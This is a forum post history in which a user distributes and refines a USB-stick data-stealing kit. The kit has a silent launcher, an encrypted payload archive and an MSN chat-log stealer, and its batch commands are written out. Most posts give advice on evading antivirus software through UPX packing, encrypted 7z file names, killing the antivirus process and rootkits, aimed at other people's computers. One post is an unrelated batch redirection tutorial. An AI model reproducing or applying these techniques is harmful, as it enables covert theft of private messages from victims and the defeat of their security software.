
Gandalf the l33er (Active Members, 48 posts)

Posts posted by Gandalf the l33er

  1. A program that uses the Windows API in a silly way would not be able to find the files for some reason.

    Similarly, people who hide file extensions will find that they cannot use the file browser in WinLAME, as it will error with a "file not found" type error.

    For some reason though, when I do not unhide them, they can still be executed.

    I think that the only problem when hiding executables is that some programs won't view the files - which is the whole point of hidden files.

    They should still be able to execute.

  2. I can do that with a WinRAR/UPX/UHARC compression as well... though UHARC probably is listed as an "illegally used compressor"... but my, are we getting away from topic... nice job as always  8-)

    I have compressed ALL files in 7zBlade with UPX, and it also prevents AV from detecting the "tools", sometimes even when they are run.

  3. Yeah, actually the 7z format is the best on the market for many applications! You should try 7-zip.

    Well... I still prefer .rar, but you know that :p

    Though I don't think that there are many AVs that will scan .7zip properly, simply because it isn't really a much used format...

    Yeah, I know :smile:

    And even if they scanned, they wouldn't find anything, because even the file _names_ are encrypted.

    Btw: I could insert DontDetectMeStupidAV in the middle of all filenames to disable AV detection by name :-D

  4. I didn't know that. That's a pretty nice feature.

    Yeah, actually the 7z format is the best on the market for many applications! You should try 7-zip.

  5. Dear everybody. .

    8< The advantage is that virus scanners can't find harmful files inside an encrypted archive, + smaller overall size (around 1

    8<

    That's not entirely true. A zipped file with a single layer of encryption still exposes the file names in the archive. If the scanner is set to search for certain file types (vbs, scr, bat, etc.), it will delete the file. This is particularly true when sending archives through email. The one way to combat this is to zip the files, encrypt, zip the zip, encrypt. Then the scanner only sees the second encrypted zip file.

    You are right, that problem applies to Zip files. But not to 7z files, especially not when you check the "encrypt filenames" button :grin:. If you try to open the image in 7-zip, you will be prompted for the PW before the contents are shown - not only when you extract.

    So, the AV can't detect the harmful files in the archive, only the files extracted to %temp%devices, and it can for sure NOT track back where the files were extracted from (which is nice - when you are "fixing" a friend's computer, they see the virus was located at the C: drive, not on your thumb drive).

  6. Any modern AV monitors _constantly_ for the opening of files - vbs, doc, exe and many more file types - and _before_ they are opened, they are scanned. After they are opened, memory is scanned every x milliseconds to check if any process created a malicious thread or contains a malicious file.

    So, at the moment the AV gets to know the .exe in its definition file, the only thing you can do is to obscure it with UPX.

  7. One of two things will happen:

    1. When the program is decrypted the AV grabs it

    or

    2. The AV will detect the embedded code used to decrypt the executable (because the .exe will not magically decrypt itself, there needs to be code there to do it) and probably flag that as a virus / suspicious

    V'cent, sablefoxx is right. The executable will be decrypted into memory at _some_ point, and the AV will grab it.

    The only other solutions are making a rootkit or recompiling source with different settings/added dummy code.

  8. Although very nice indeed, you might want to include a process hider, as cmd is shown in the ctrl+alt+del menu, and one can hear the hard drive suddenly starting to work... (though these things may be ignored). And my AV detects a pretty big lot of infected files inside of the .7zip...

    It is very hard... I _have_ compressed all the files, but as soon as they are run, the memory image in RAM is the same as if they were not compressed. The only way of making them undetectable is to recompile them with a lot of unused functions (which only exist to change the binary pattern) added.

    The problem is that many of the apps are commercial or non-Open-Source, so recompiling isn't that simple.

    If they should be hidden from Task Manager, the only _easy_ way is to make them services, which also needs recompiling.

    There is one other possibility: a rootkit. But I am not a H4xX0R, I'm only a _1337_ h4xX0r. Maybe you can ask the good folks at Sony if you need a rootkit :P

    Which executables does your AV detect (btw I AM planning to include an AV killer (maybe hexlax', as soon as he makes an AV-kill-only version))?

  9. Lots of different methods, look around through the forums to find them.

    Hint: pskill.exe (from sysinternals)

    I think I wouldn't need to kill the antivirus bc in that case people will notice about it, I would just need to disable it for about 6-7 hours a day during a week or something and then leave it as before. And if I use the killer anti-virus, I think this will erase it forever, right?

    any advice/suggestion?

    The AV finds viruses by looking at the bit layout... try to modify the applications by packing/unpacking them with upx, http://upx.sourceforge.net/. Open a cmd, cd to the folder containing the files and upx.exe, enter

    upx -9 *

    to compress all files as much as possible, or

    upx -d *

    to decompress.

  10. Yes, | sends the output of the left-side command to the right-side command. A very common use of it is

    cat largefile.txt | more

    which displays the file in "screens", using the utility more.exe.

    Another way to say it: (taken from http://www.infionline.net/~wtnewton/batch/batguide.html)

    Redirection and Pipes

    Normally, input is taken from the keyboard and output goes to the console. Redirection allows input and output to refer to a file or device instead. Pipes allow the output of one program to be used as input to another program. These symbols only work with programs that read from "standard input" and write to "standard output" but fortunately this includes most DOS commands.

        * The < symbol causes file to be fed to the program as input.

        * The > symbol causes the program's output to be sent to the following file or device.

        * The >> symbol causes the program's output to be appended to the file or device.

        * The | symbol (the pipe) causes the output of the preceding program to be sent to the following program.

    The following example shows how to use redirection with the FIND command...

        @echo off

        find %1<%2>nul

        if not errorlevel 1 echo %2 contains %1
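    To show each of the four operators from the quoted batguide text in one runnable script, here is an added example; it is not code from the original post or from the batguide page. It builds its own constructed sample file (sample.txt) and writes to report.txt; both filenames are assumptions.

```batch
@echo off
rem Added example (not from the original post): exercises each redirection
rem operator from the quoted batguide text on a constructed sample file.
rem The filenames sample.txt and report.txt are assumptions.

rem > creates (or overwrites) the file; >> appends to it.
rem The lines themselves are constructed sample log entries.
echo login ok     user=alice> sample.txt
echo login FAILED user=bob>> sample.txt
echo login ok     user=carol>> sample.txt
echo login FAILED user=bob>> sample.txt

rem < feeds the file to FIND on standard input; > sends FIND's
rem output (the matching lines) to report.txt instead of the console.
find "FAILED" < sample.txt > report.txt

rem | pipes TYPE's output into FIND; /C makes FIND print only the
rem number of matching lines (2 for the sample above).
type sample.txt | find /C "FAILED"

rem FIND sets ERRORLEVEL 0 when at least one line matched and 1 when
rem nothing matched, which is what the batguide snippet tests with
rem "if not errorlevel 1". Output is discarded with > nul here.
find "FAILED" < sample.txt > nul
if not errorlevel 1 echo sample.txt contains FAILED lines, see report.txt
if errorlevel 1 echo no FAILED lines found in sample.txt
```

    Run it from a cmd.exe prompt in a scratch directory; FIND's search string is case-sensitive unless you add /I, so "failed" in lower case would not count as a match.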

  11. It's indeed a very nice package hexlax, mad_props to ya!

    But, I like to keep it as small as possible, so I will wait till you have made a "light" version that only kills AV.

    I've updated my package quite a bit, added MSN Messenger chatlog stealer and made the whole thing a lot more customizable. See the first post for details.

  12. I decided to come up with something new. This package first puts the dir of the Messenger chat history folder in a text file (couldn't see any elegant way to do it), and then reads the text file and puts the dir in a var. Then it copies the chatlog.

    Needed file: http://www.myupload.dk/showfile/9418f7520.exe/

    Commands:

    .MsnHistory.exe>msnlogdir.txt
    Set /P MSNLOG=<msnlogdir.txt
    del msnlogdir.txt
    md WIPdump%computername%Chatlog
    xcopy /E /C /H /Y /I "%MSNLOG%" "WIPdump%computername%Chatlog"

    What do you think?

    (the little cmdline app is a modded version of some code from some forum)

  13. Dear everybody. .

    Just finished a version of the USB Switchblade, where all the files are stored in a 7zip file. The password for the file is haxx0r. The advantage is that virus scanners can't find harmful files inside an encrypted archive, + smaller overall size (around 1 MB).

    It works no matter where you place it, in any folder on any drive.

    Files included:

    Start.vbs: Runs Run.bat in "silent" mode, VERY silent, NO black popups are shown

    Run.bat: Decrypts and extracts image.7z using 7z.exe (7-zip command-line version) and runs the specified commands.

    7z.exe: 7-zip CLI. (http://www.7-zip.org/)

    image.7z: A 7z archive encrypted with the password "haxx0r", containing the bin files.

    NEWEST version:

    ONLY 560 kb! Uses %temp% and finishes in about 19 seconds! Includes msn chatlog stealer

    Direct link

    OLD version:

    Myupload
